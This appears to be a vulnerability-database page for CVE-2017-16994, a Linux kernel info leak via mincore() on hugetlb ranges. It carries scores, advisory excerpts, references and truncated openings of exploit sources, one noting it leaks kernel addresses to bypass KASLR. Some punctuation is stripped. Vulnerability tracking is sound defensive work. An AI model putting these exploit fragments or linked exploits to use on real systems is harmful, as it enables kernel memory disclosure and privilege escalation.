Published: 27/11/2017 Updated: 25/04/2018

CVSS v2 Base Score: 2.1 | Impact Score: 2.9 | Exploitability Score: 3.9

CVSS v3 Base Score: 5.5 | Impact Score: 3.6 | Exploitability Score: 1.8

VMScore: 225

Vector: AV:L/AC:L/Au:N/C:P/I:N/A:N

The walk_hugetlb_range function in mm/pagewalk.c in the Linux kernel prior to 4.14.2 mishandles holes in hugetlb ranges, which allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call.

Vulnerable Product	Search on Vulmon	Subscribe to Product
linux linux kernel

Synopsis Important: kernel-alt security and bug fix update Type/Severity Security Advisory: Important Topic An update for kernel-alt is now available for Red Hat Enterprise Linux 7Red Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring System ...

A flaw was found in the patches used to fix the 'dirtycow' vulnerability (CVE-2016-5195) An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages (CVE-2017-1000405) Linux kernel Virtualization Module (CONFIG_KVM) for the Intel processor family (CONFIG_KVM_INTEL) is vulnerab ...

Several security issues were fixed in the Linux kernel ...

The walk_hugetlb_range() function in 'mm/pagewalkc' file in the Linux kernel from v40-rc1 through v415-rc1 mishandles holes in hugetlb ranges This allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call ...

/* * The source is modified from * bugschromiumorg/p/project-zero/issues/detail?id=1431 * I try to find out infomation useful from the infoleak * The kernel address can be easily found out from the uninitialized memory * leaked from kernel, which can help bypass kaslr */ #define _GNU_SOURCE #include <unistdh> #include <s ...

/** disable_map_min_addc **/ /* * */ #include <stdioh> #include <sys/typesh> #include <sys/waith> #include <unistdh> #include <stdlibh> #include <sys/resourceh> #include <syscallh> /* offsets might differ, kernel was custom compiled * you can read vmlinux and caculate the offset when testing * ...

/* Source: bugschromiumorg/p/project-zero/issues/detail?id=1431 I found the following bug with an AFL-based fuzzer: When __walk_page_range() is used on a VM_HUGETLB VMA, callbacks from the mm_walk structure are only invoked for present pages However, do_mincore() assumes that it will always get callbacks for all pages in the range pass ...

CWE-200 https://github.com/torvalds/linux/commit/373c4557d2aa362702c4c2d41288fb1e54990b7c https://bugs.chromium.org/p/project-zero/issues/detail?id=1431 http://www.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.14.2 http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=373c4557d2aa362702c4c2d41288fb1e54990b7c http://www.securityfocus.com/bid/101969 https://www.exploit-db.com/exploits/43178/https://access.redhat.com/errata/RHSA-2018:0502 https://usn.ubuntu.com/3617-2/https://usn.ubuntu.com/3617-1/https://usn.ubuntu.com/3619-1/https://usn.ubuntu.com/3617-3/https://usn.ubuntu.com/3619-2/https://usn.ubuntu.com/3632-1/https://access.redhat.com/errata/RHSA-2018:0502 https://nvd.nist.gov https://usn.ubuntu.com/3617-2/https://www.exploit-db.com/exploits/44304/https://alas.aws.amazon.com/ALAS-2017-937.html

CVE-2017-16994

Vulnerability Summary

Vulnerability Trend

Vendor Advisories

Exploits

References

Vulmon Search

About

Products

Connect